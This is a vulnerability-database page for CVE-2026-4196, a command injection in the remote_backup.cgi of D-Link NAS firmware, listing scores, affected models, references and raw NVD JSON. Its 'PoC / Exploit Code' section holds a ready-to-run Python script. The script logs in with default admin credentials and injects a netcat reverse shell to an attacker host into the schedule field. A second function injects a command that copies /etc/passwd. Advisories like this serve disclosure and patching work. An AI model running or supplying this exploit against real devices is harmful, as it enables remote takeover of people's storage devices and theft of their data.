CVE-2026-4196

Description

A vulnerability has been found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20260205. This impacts the function cgi_recovery/cgi_backup_now/cgi_set_schedule/cgi_set_rsync_server of the file /cgi-bin/remote_backup.cgi. The manipulation leads to command injection. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:dlink:dns-1550-04_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dns-1550-04:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dns-315l_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dns-315l:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dns-320:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dns-320l_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dns-320l:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dlink:dns-320lw_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dns-320lw:-:*:*:*:*:*:*:* - NOT VULNERABLE

D-Link DNS-120 固件版本 < 20260205

D-Link DNR-202L 固件版本 < 20260205

D-Link DNS-315L 固件版本 < 20260205

D-Link DNS-320 固件版本 < 20260205

D-Link DNS-320L 固件版本 < 20260205

D-Link DNS-320LW 固件版本 < 20260205

D-Link DNS-321 固件版本 < 20260205

D-Link DNR-322L 固件版本 < 20260205

D-Link DNS-323 固件版本 < 20260205

D-Link DNS-325 固件版本 < 20260205

D-Link DNS-326 固件版本 < 20260205

D-Link DNS-327L 固件版本 < 20260205

D-Link DNR-326 固件版本 < 20260205

D-Link DNS-340L 固件版本 < 20260205

D-Link DNS-343 固件版本 < 20260205

D-Link DNS-345 固件版本 < 20260205

D-Link DNS-726-4 固件版本 < 20260205

D-Link DNS-1100-4 固件版本 < 20260205

D-Link DNS-1200-05 固件版本 < 20260205

D-Link DNS-1550-04 固件版本 < 20260205

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-4196 PoC - D-Link NAS Command Injection
# Target: D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, 
#         DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326,
#         DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, DNS-1550-04

target_ip = "192.168.1.100"
target_port = 80
target_url = f"http://{target_ip}:{target_port}/cgi-bin/remote_backup.cgi"

# Login credentials (low privilege required)
username = "admin"
password = "admin"

# Command injection payload - creates reverse shell
# Inject via cgi_set_schedule function
payload = ";nc -e /bin/bash <attacker_ip> <attacker_port>;"

def exploit_cve_2026_4196():
    """Exploit command injection in remote_backup.cgi"""
    
    # Step 1: Login to obtain session
    login_data = {
        "username": username,
        "password": password
    }
    
    session = requests.Session()
    login_response = session.post(
        f"http://{target_ip}:{target_port}/cgi-bin/login.cgi",
        data=login_data
    )
    
    if login_response.status_code != 200:
        print("[-] Login failed")
        return False
    
    print("[+] Login successful")
    
    # Step 2: Exploit via cgi_set_schedule function
    exploit_data = {
        "func": "cgi_set_schedule",
        "schedule_name": "backup_job",
        "schedule_time": payload,  # Command injection point
        "backup_type": "full"
    }
    
    response = session.post(target_url, data=exploit_data)
    
    if response.status_code == 200:
        print("[+] Exploit sent successfully")
        print("[*] Check for reverse shell on attacker machine")
        return True
    else:
        print("[-] Exploit failed")
        return False

def alternative_exploit():
    """Alternative exploit via cgi_backup_now function"""
    
    session = requests.Session()
    
    # Login first
    session.post(
        f"http://{target_ip}:{target_port}/cgi-bin/login.cgi",
        data={"username": username, "password": password}
    )
    
    # Exploit via cgi_backup_now
    exploit_data = {
        "func": "cgi_backup_now",
        "backup_path": ";cat /etc/passwd > /tmp/pwned;"
    }
    
    response = session.post(target_url, data=exploit_data)
    return response.status_code == 200

if __name__ == "__main__":
    print("CVE-2026-4196 D-Link NAS Command Injection Exploit")
    print("=" * 50)
    exploit_cve_2026_4196()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4196
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4196
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4196/
[4] VulDB https://vuldb.com/cve/CVE-2026-4196
[5] https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_98/98.md
[6] https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_99/99.md
[7] https://vuldb.com/?ctiid.351108
[8] https://vuldb.com/?id.351108
[9] https://vuldb.com/?submit.769855
[10] https://vuldb.com/?submit.769856
[11] https://vuldb.com/?submit.769857
[12] https://vuldb.com/?submit.769858
[13] https://www.dlink.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4196", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:03.730", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 and DNS-1550-04 up to 20260205. This impacts the function cgi_recovery/cgi_backup_now/cgi_set_schedule/cgi_set_rsync_server of the file /cgi-bin/remote_backup.cgi. The manipulation leads to command injection. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05 y DNS-1550-04 hasta 20260205. Esto afecta la función cgi_recovery/cgi_backup_now/cgi_set_schedule/cgi_set_rsync_server del archivo /cgi-bin/remote_backup.cgi. La manipulación conduce a inyección de comandos. El ataque es posible de realizar de forma remota. El exploit ha sido divulgado al público y puede ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dns-1550-04_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "2026-02-05", "matchCriteriaId": "FAE008F5-7F73-4572-B575-FF0AD3FA2A78"}]}, {"operator": "OR", "negate": false, "cpeMa ... (truncated)